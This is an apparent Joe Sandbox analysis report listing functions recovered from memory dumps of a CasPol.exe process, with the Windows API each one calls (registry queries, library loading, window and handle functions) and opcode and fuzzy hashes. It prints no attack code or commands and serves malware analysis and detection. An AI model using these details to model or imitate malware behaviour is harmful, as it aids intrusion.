                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: b78bac6bdcba8b4bae803d59072f91f2a1222362e1d678c67c470240a9c914ab
                                                                                    • Instruction ID: 2705d3acacd37799c7837ef3c5b154616c95b6f9b1f42cd35454b837b4b8569d
                                                                                    • Opcode Fuzzy Hash: b78bac6bdcba8b4bae803d59072f91f2a1222362e1d678c67c470240a9c914ab
                                                                                    • Instruction Fuzzy Hash: 37124874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01007723 Relevance: 1.9, APIs: 1, Instructions: 412libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733537398.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1000000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6fd311fc944244fd09a7fc443d62005a6b96274b5e02cb1686642df2b297cf8a
                                                                                    • Instruction ID: af31a823589028e076b4a41b6fd2a7940ed5f650c6e3719219f5d519739b1e62
                                                                                    • Opcode Fuzzy Hash: 6fd311fc944244fd09a7fc443d62005a6b96274b5e02cb1686642df2b297cf8a
                                                                                    • Instruction Fuzzy Hash: E7123874A04228CFCB65EF70C888B9DB7B6BF88205F5081EAD54AA3744DB359E85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0156AE08 Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19736378864.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1560000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c7bf1f6fe23964f5c2758704549c2f8b4af8a8db62a9d254431d31a6191a5d7c
                                                                                    • Instruction ID: c74bed3c9d37255178f9aaa5177ecd7ad3e5ac1864fb60915bd8a006f53f4157
                                                                                    • Opcode Fuzzy Hash: c7bf1f6fe23964f5c2758704549c2f8b4af8a8db62a9d254431d31a6191a5d7c
                                                                                    • Instruction Fuzzy Hash: 43617D70A10215DFDB18EBB4C4587AEBBF6BF88345F108828E512EB294DB39DC45CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0156A9F9 Relevance: 1.7, APIs: 1, Instructions: 175libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19736378864.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1560000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 8d42287be2d06fd11744669bc970893dbf5be526c16342972f9f803d6e97acce
                                                                                    • Instruction ID: 5f1ff850bc63a273719fd81e71179064b3a5032f3df23492f6662c0d3cb765da
                                                                                    • Opcode Fuzzy Hash: 8d42287be2d06fd11744669bc970893dbf5be526c16342972f9f803d6e97acce
                                                                                    • Instruction Fuzzy Hash: 8A51C531B043059FCB05DBB4C844AAEBBF6BF85214F14896AE102DF661EB71DC05CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5B6781 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8da844d111d6e7108ac79178caa5c117eabbd722f030e6ffb32ad12cd435d7d4
                                                                                    • Instruction ID: 147c3a35e263c44dc14828f8958274826b5bbaa5c19b02de90cf8d14be388b0b
                                                                                    • Opcode Fuzzy Hash: 8da844d111d6e7108ac79178caa5c117eabbd722f030e6ffb32ad12cd435d7d4
                                                                                    • Instruction Fuzzy Hash: 5261E071C00249EFCF06CF95C880ADDBFB2BF89314F15816AE918AB221D7319955CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5B4600 Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D5B690A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: bcdcae116798112e7cbad5f9ea6f94af8e1570bc203a00f0ab440884c7486138
                                                                                    • Instruction ID: 887a419643e7be8a9f538a188c6e1f332096b0a9934779b873301bbf8cbff1e9
                                                                                    • Opcode Fuzzy Hash: bcdcae116798112e7cbad5f9ea6f94af8e1570bc203a00f0ab440884c7486138
                                                                                    • Instruction Fuzzy Hash: A8514871C093899FCB05CFA9C890ADEBFB5BF89314F15815AE414AB251D7349844CFA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0156AA58 Relevance: 1.6, APIs: 1, Instructions: 148libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19736378864.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1560000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 6ee38ccea17bb032643c624b9c18cba52ceb64b789c6f7a8d3cdf1db6d0ccd57
                                                                                    • Instruction ID: 7ad04003e3b150e35b0c77d2b3a47358661cba498a5b7e19e271ab89b70147a6
                                                                                    • Opcode Fuzzy Hash: 6ee38ccea17bb032643c624b9c18cba52ceb64b789c6f7a8d3cdf1db6d0ccd57
                                                                                    • Instruction Fuzzy Hash: E051B431B002059FCB04EBB4C884AAEB7F6BF89600F048A69E1129F751EF71EC04CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1C77B048 Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19756556281.000000001C770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C770000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1c770000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0eaa048b25b893cd5286f170edf14ba130b7b4474ca539c21896640873519501
                                                                                    • Instruction ID: ebebb0e8f34341256eb99e5ecaca27279972de8972b600704f9cdb48d02d67f1
                                                                                    • Opcode Fuzzy Hash: 0eaa048b25b893cd5286f170edf14ba130b7b4474ca539c21896640873519501
                                                                                    • Instruction Fuzzy Hash: B7412371D043898FCB04CFB5D8186EEBBF4EFCA220F15856AD508A7651DB78A845CBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01426A60 Relevance: 1.6, APIs: 1, Instructions: 119registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01426B79
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19735902032.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1420000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: 9508bdc2559677a7e2f5fd938a1301903434a5a5237b2bac3f8946dc292a298b
                                                                                    • Instruction ID: a1326dbd3f951981f6abab5d1d909614143a132b6f587034cc464aa2904af662
                                                                                    • Opcode Fuzzy Hash: 9508bdc2559677a7e2f5fd938a1301903434a5a5237b2bac3f8946dc292a298b
                                                                                    • Instruction Fuzzy Hash: F7418970E042689FCB11CFA9C984A9EBFF1AF49304F15806AE808AB361D7349944CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5BA610 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D5BA5D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: f11494eca78add09d06b3eb982a0574bab002213a9b34f835b5aece83079c166
                                                                                    • Instruction ID: 943ead4d152711903c47a5ea49c582236ba0476628f7d0d0a8ccb6033809aabf
                                                                                    • Opcode Fuzzy Hash: f11494eca78add09d06b3eb982a0574bab002213a9b34f835b5aece83079c166
                                                                                    • Instruction Fuzzy Hash: 9C41AB796403A49FEB01DFA8D8D4BAABBB5FB4D751F004129E9019B3C1CB759901CF21
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 014267A8 Relevance: 1.6, APIs: 1, Instructions: 116registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 014268BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19735902032.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1420000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 74fd7664c94d2d82d5869ab5477c47000acef92341bc193cb244012fed00e5eb
                                                                                    • Instruction ID: 133163d38352250da721f8d07897f0862fd42dba7b9bbb70793f0131cf15d8ef
                                                                                    • Opcode Fuzzy Hash: 74fd7664c94d2d82d5869ab5477c47000acef92341bc193cb244012fed00e5eb
                                                                                    • Instruction Fuzzy Hash: 2A4189B0E05299CFDB04CFA9C544A8EFFF1BF89304F29816AE809AB351D7749845CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5B4674 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1D5B690A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 665d7939f68353844d0e62a74767b7fdecc3a485441b837b474c7dc5dde27576
                                                                                    • Instruction ID: d01eaba10fa96e07809d072a76e6634d4e31812275872d8fffaab97f0c9075c2
                                                                                    • Opcode Fuzzy Hash: 665d7939f68353844d0e62a74767b7fdecc3a485441b837b474c7dc5dde27576
                                                                                    • Instruction Fuzzy Hash: 5851AEB1D10349DFDB14CF99C884ADEBBB6FF88310F64852AE819AB210D771A945CF91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0156ADA8 Relevance: 1.6, APIs: 1, Instructions: 103libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19736378864.0000000001560000.00000040.00000800.00020000.00000000.sdmp, Offset: 01560000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1560000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 0a819bf2ebaf0f56af03a1417951eebdf9eb8985114069095b1932e3783c3432
                                                                                    • Instruction ID: 4eaa45a1e8776ce2dcb83d9572f169e3cf9854d29aed4f1131a73da151bc2be2
                                                                                    • Opcode Fuzzy Hash: 0a819bf2ebaf0f56af03a1417951eebdf9eb8985114069095b1932e3783c3432
                                                                                    • Instruction Fuzzy Hash: 4031F030A183458FDB19CB74C8856EDBFB1FF86325F0484AAD041AF252CB399C46CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5BA144 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 1D5BB4E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: f570fff207edc144fec75f00aec97ff29196d6073bfa2107b0f4cb728bbd313b
                                                                                    • Instruction ID: 00fa87e8c89223904c86086dbc5a1ed00cc16c2b9a9c8bbb101055c4b9a13095
                                                                                    • Opcode Fuzzy Hash: f570fff207edc144fec75f00aec97ff29196d6073bfa2107b0f4cb728bbd313b
                                                                                    • Instruction Fuzzy Hash: 054158B4900209CFCB14CF99C484AAEFBF6FF88314F24C849D519AB321D775A840CBA2
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01424E94 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 01426B79
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19735902032.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1420000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3660427363-0
                                                                                    • Opcode ID: 2f596f2418d67418b37f5a18a938325239622beb9884d168376628c6bbb9ef08
                                                                                    • Instruction ID: 7fc50cf425ab5e33c7184277e8bf35b3471a959888c5298db32da46933cb256f
                                                                                    • Opcode Fuzzy Hash: 2f596f2418d67418b37f5a18a938325239622beb9884d168376628c6bbb9ef08
                                                                                    • Instruction Fuzzy Hash: 9431DFB1D002689FCB14CF9AC984A9EFFF5BF48304F55802AE919AB310D774A945CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01424E88 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 014268BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19735902032.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1420000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: c69d93957fc27d0fdb0e6d241fe491d36b44c94b2ab665dcadecc203a3fcf2e1
                                                                                    • Instruction ID: 83693dc0c652c382b80e99883d000651e61e1d245ad83072aca1e94792d5d22f
                                                                                    • Opcode Fuzzy Hash: c69d93957fc27d0fdb0e6d241fe491d36b44c94b2ab665dcadecc203a3fcf2e1
                                                                                    • Instruction Fuzzy Hash: 473112B0D05288DFDB14CF99C584A8EFFF5BF48304F69816AE809AB311C7759885CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0110E3CC Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19734044248.0000000001100000.00000040.00000400.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1100000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: TerminateThread
                                                                                    • String ID:
                                                                                    • API String ID: 1852365436-0
                                                                                    • Opcode ID: cdaadce9cbb89dcfee2c6a319ee8041358eef6cae20e9efb45279b1f7bf2ca0a
                                                                                    • Instruction ID: 9d31fd8092475dde4a16f46cafcb74297b9015deb6320f533909a62cb50b78cc
                                                                                    • Opcode Fuzzy Hash: cdaadce9cbb89dcfee2c6a319ee8041358eef6cae20e9efb45279b1f7bf2ca0a
                                                                                    • Instruction Fuzzy Hash: FC212CB8A06201CFDB7ACA25C0D8BA137935F51214F4ACEA6D8448F1E2EBB6C4C4C743
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5BA54B Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D5BA5D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 61d06f3c465f2ad4bfa7da21cb25415966c191117d731d9fed700854c474bf3c
                                                                                    • Instruction ID: 23e30ce11d0a8e9b73fcb35ded18dfef672ea7271b2afe4f8da7eae35a679c4d
                                                                                    • Opcode Fuzzy Hash: 61d06f3c465f2ad4bfa7da21cb25415966c191117d731d9fed700854c474bf3c
                                                                                    • Instruction Fuzzy Hash: AA21E3B5900249AFDB10CFA9D885ADEFFF4EB48310F14841AE959A3350C375AA54CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5BA550 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D5BA5D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 7fb7ae57493a98268e612e218b4dcb5abc24091528b8a020ea4ea4d6620cf475
                                                                                    • Instruction ID: bb94b64cddb0ce07de2a54379444cc3a00e86c11f2b49bf28eaf8d412a4b4ea0
                                                                                    • Opcode Fuzzy Hash: 7fb7ae57493a98268e612e218b4dcb5abc24091528b8a020ea4ea4d6620cf475
                                                                                    • Instruction Fuzzy Hash: 8E21C4B5D002489FDB10CF99D884ADEFBF5FB48310F14841AE919A3350D374AA54CFA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01083F10 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,01083EF1,00000800), ref: 01083F82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733751864.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1080000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: faaf1f08713ea411d1ccef819c67922349553a95c9381e915bd63a379f461deb
                                                                                    • Instruction ID: c449e642ac2fd2b9f2b97bbc8c90e9964d5c891d451117bc0e457037224c6412
                                                                                    • Opcode Fuzzy Hash: faaf1f08713ea411d1ccef819c67922349553a95c9381e915bd63a379f461deb
                                                                                    • Instruction Fuzzy Hash: AC112FB68042489FDB14CF9AD844ADEFBF4EB88324F14842EE959A7600C378A505CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01081078 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(00000000,00000000), ref: 010810F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733751864.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1080000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindWindow
                                                                                    • String ID:
                                                                                    • API String ID: 134000473-0
                                                                                    • Opcode ID: fdb488da4811456c8855d649f565234c41a2c666c5b7eea4bf66de768f2fb06a
                                                                                    • Instruction ID: b9ae5de9825b53a8a2ba6b4a4e7598de6ded6f962ea4ffa91a0fe351244a7829
                                                                                    • Opcode Fuzzy Hash: fdb488da4811456c8855d649f565234c41a2c666c5b7eea4bf66de768f2fb06a
                                                                                    • Instruction Fuzzy Hash: CE210FB5D002498EDB14CF9AD884ADEFBF0FF89314F14856ED859A7600C375A546CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1C77B119 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,1C77B09A), ref: 1C77B187
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19756556281.000000001C770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C770000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1c770000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    • Opcode ID: 1cdd66c28f8e1b640d4b5a651ab4546fdeb0996136fc591945cf71f30989b5fc
                                                                                    • Instruction ID: a5d337b37a026aa4305ba4be31ba3030608fac6aab8c620a2e6e2502ebe8d4fa
                                                                                    • Opcode Fuzzy Hash: 1cdd66c28f8e1b640d4b5a651ab4546fdeb0996136fc591945cf71f30989b5fc
                                                                                    • Instruction Fuzzy Hash: C01106B1C106599FCB00CFA9D844BEEFBB4EF89224F15816AD918B7640D378A941CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01082C4C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,01083EF1,00000800), ref: 01083F82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733751864.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1080000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 266d07ea2011838b67e3dac459904f7755efca5fc191864195e3fd1bcb6cf68f
                                                                                    • Instruction ID: b1bdde9fbe6c9c7334c596c349848cf35652975ca905e924ca70345461cd0a56
                                                                                    • Opcode Fuzzy Hash: 266d07ea2011838b67e3dac459904f7755efca5fc191864195e3fd1bcb6cf68f
                                                                                    • Instruction Fuzzy Hash: F71133B58042489FCB14CF9AD844B9EFBF4FB88714F10842AE999AB201C374A504CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1C777264 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,1C77B09A), ref: 1C77B187
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19756556281.000000001C770000.00000040.00000800.00020000.00000000.sdmp, Offset: 1C770000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1c770000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: GlobalMemoryStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1890195054-0
                                                                                    • Opcode ID: 4be8c9c73c0c70378554f142826ea970d395b6bcf04bd40bfea377a777470962
                                                                                    • Instruction ID: 005afeb0268564113b812b85a03a2a8e68dc3f91b2531697b3510cbb9944c926
                                                                                    • Opcode Fuzzy Hash: 4be8c9c73c0c70378554f142826ea970d395b6bcf04bd40bfea377a777470962
                                                                                    • Instruction Fuzzy Hash: EB11F2B1C046599FCB00CF9AC4487AEFBB4FB48224F15812AD918A7640D378A940CBE6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 01081080 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindWindowW.USER32(00000000,00000000), ref: 010810F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19733751864.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1080000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindWindow
                                                                                    • String ID:
                                                                                    • API String ID: 134000473-0
                                                                                    • Opcode ID: 74c4f831a1b188d7a16d9925bb7db43517ea8ffc45b8b42c087aa9bfaaaed7b1
                                                                                    • Instruction ID: e4febfb8652e11ee5b537524d3c679ee42d15a5a51314aedddd13268d1bfb20f
                                                                                    • Opcode Fuzzy Hash: 74c4f831a1b188d7a16d9925bb7db43517ea8ffc45b8b42c087aa9bfaaaed7b1
                                                                                    • Instruction Fuzzy Hash: BF113BB5C002498ECB14CF9AC884ADEFBF4FF89210F10852ED899B7200C3B5A506CFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 1D5B37C8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 1D5B53B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.19758190712.000000001D5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D5B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1d5b0000_CasPol.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
